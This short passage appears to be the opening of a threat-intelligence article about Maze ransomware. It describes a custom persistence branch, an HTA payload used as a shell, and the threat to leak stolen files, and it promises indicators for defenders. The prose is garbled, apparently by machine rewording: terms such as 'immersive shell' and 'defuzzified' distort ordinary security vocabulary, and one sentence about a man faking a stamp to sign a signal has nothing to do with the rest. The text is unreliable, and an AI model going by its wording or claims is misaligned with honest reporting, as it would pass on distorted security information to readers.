Maze ransomware is currently one of the most widely used wild ransomware, and is distributed by competent participants.
Before shipping the ransomware we found a Maze branch that implemented a tailor-made persistence system.
Perhaps the man had used a fake stamp to sign his signal.
Like for other attacks , the attacker uses the HTA payload as an immersive shell capable of collecting information in real time and being defuzzified.
Over the past year or so the Maze malware has been extensively used and has been the main weapon for many different players around the world. Last year, not only did the infamous Maze developer begin blackmailing the company by encrypted files, but they have threatened releasing the stolen files publicly to blackmail the company. Recently we found a member of Maze who was trying to spread across our customers’ network.
We share detailed information on using the Maze member in this article to clarify their strategy and help the security team find similar IOCs in their own network.